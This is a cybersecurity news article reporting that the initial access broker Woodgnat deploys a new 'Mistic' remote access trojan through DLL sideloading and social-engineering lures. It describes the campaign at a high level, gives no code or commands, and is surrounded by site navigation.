New ‘Mistic’ RAT Opens Door to Several Ransomware Families

Summary

A new remote access trojan (RAT) named Mistic is being deployed by the initial access broker (IAB) Woodgnat, also known as KongTuke. Woodgnat has been observed working with several ransomware groups including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta, targeting organizations across various sectors opportunistically. The RAT provides typical backdoor functionalities and has been delivered via DLL sideloading, sometimes alongside credential stealers and other common Windows tools.

Full text

An initial access broker (IAB) linked to multiple ransomware families has been using a new remote access trojan (RAT) in recent attacks, Broadcom’s Symantec and Carbon Black threat hunter team reports. The threat actor, tracked as Woodgnat and KongTuke, and active since at least May 2024, is known to have ties to ransomware groups such as Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta. Starting in April 2026, Woodgnat has been deploying the new Backdoor.Mistic RAT against the networks of organizations across multiple industries, including education, insurance, IT, and professional services. Previously, the threat actor was observed deploying the ModeloRAT in attacks targeting other entities. “The targeting appears to be opportunistic, with the attackers casting a wide net and then assessing which organizations they could sell access to rather than focusing on a single sector,” Broadcom’s researchers say. Also tracked as MLTBackdoor, Mistic provides attackers with typical capabilities, including file download and upload, file manipulation, folder creation, and code execution. The attackers can also modify the frequency at which the malware checks for new commands and can instruct it to terminate itself.Advertisement. Scroll to continue reading. Woodgnat has been deploying the backdoor as a DLL, executing it via sideloading. In a recent attack, the threat actor also deployed a credential stealer alongside Mistic. Additional tools observed in the intrusion include Curl, Reg.exe, Net (net.exe), PowerShell, Certutil, and WMIC (Windows Management Instrumentation), for data exfiltration, registry manipulation, network resource management, command execution, reconnaissance, lateral movement, file download, and browser certificate installation. The IAB is known for distributing malware via compromised WordPress sites and for relying on social engineering to entice users into executing attacker-supplied commands, including the ClickFix, FileFix, and CrashFix techniques. “In each case the victim is ultimately tricked into running an attacker-supplied PowerShell command. While the initial compromise may be opportunistic, the attackers profile the machines for potential interest to determine their value and if they can sell access to them,” Broadcom’s threat hunter team says. Since April 2026, the threat actor has also been using helpdesk and IT-support lures delivered via Microsoft Teams to convince victims into executing malicious code. Related: Russian Initial Access Broker Behind FortiBleed Campaign Related: Hackers Exploiting Cisco Unified CM Vulnerability Related: Microsoft Teams Relay Servers Abused in DragonForce Ransomware Attack Related: Over 1.4 Million Accounts Disrupted in Cybercrime Crackdown Written By Ionut Arghire Ionut Arghire is an international correspondent for SecurityWeek. Daily Briefing Newsletter Subscribe to the SecurityWeek Email Briefing for the latest cybersecurity threats, trends, and expert insights. More from Ionut Arghire FFmpeg PixelSmash Flaw Allows RCE on Video Players, Media Servers, NAS AppliancesOpenAI Refocuses Cybersecurity Efforts on Patching Over DiscoveryRussian Initial Access Broker Behind FortiBleed CampaignCanadian Electricity Provider London Hydro Discloses Data BreachAttackers Exploit Gravity SMTP Plugin Flaw to Harvest Valuable WordPress DataNorth Korean Hackers Blamed for Mastra NPM Supply Chain AttackFortinet Responds to FortiBleed CampaignMore Cybersecurity Firms Disclose Impact From Klue Hack Latest News Agentic AI Security: Wrong Context, Wrong Decisions at Machine SpeedExploitable CI/CD Vulnerabilities Expose Millions of Repositories to HijackingBeyondTrust, LastPass Impacted by Klue-Salesforce IncidentWebinar Today: Modern Exposure Validation in the AI EraHackers Exploiting Cisco Unified CM VulnerabilityAnthropic’s Mythos Model Found Vulnerabilities in Classified US Government Systems, Official SaysDragos Unveils AI for OT Security Data Exposure Flaws Threaten Dify AI Platform Used by 1 Million Apps Trending Daily Briefing NewsletterSubscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts. Webinar: How Modern Breaches Bypass MFA and Evade Detection June 17, 2026 Today’s attackers are no longer breaking in — they’re logging in. Join this live webinar as we break down the modern identity attack chain and examine how recent breaches exploited weaknesses in authentication, identity verification, and access management processes. Register Webinar: Modern Exposure Validation in the AI Era June 24, 2026 AI has accelerated both sides of the fight. Adversaries are weaponizing vulnerabilities faster, while defenders are racing to ship detections and configurations. Join this live webinar as we explore how to prove your controls actually hold against new threats, map your security maturity, and unite breach simulation with automated pentesting into a single, coordinated program. Register People on the MoveSolarWinds has appointed Justin Henkel as Chief Information Security Officer.J. Paul Haynes has joined Cinchy as Chief Executive Officer.Hatem Naguib has become Chief Executive Officer at Sysdig.More People On The MoveExpert Insights What the Latest ShinyHunters Breaches Reveal About Modern Cyberattacks Groups like ShinyHunters are demonstrating that attackers do not necessarily need malware or zero-day exploits to cause massive damage. (Torsten George) No Exploits Required Four decades of incident response experience suggest that exploits are often the symptom, not the root cause, of today’s cybersecurity failures. (Tod Beardsley) After AI Reaches Production: 12 Ways Security Teams Can Take Control Security teams need more than visibility into AI applications, they need a repeatable framework for monitoring, investigating, and defending them in production. (Joshua Goldfarb) Everybody Is Vibe Coding But Nobody Told the Security Team AI-driven development is not something organizations can or should block. But it must be governed. (Danelle Au) The Zero-Knowledge Threat Actor and the End of Responsible Disclosure AI can help attackers generate malware, create malicious payloads, bypass simple security checks, and convert vague malicious intent into functional code. (Etay Maor) Flipboard Reddit Whatsapp Whatsapp Email

Indicators of Compromise

• malware — Mistic
• malware — MLTBackdoor
• malware — ModeloRAT

Entities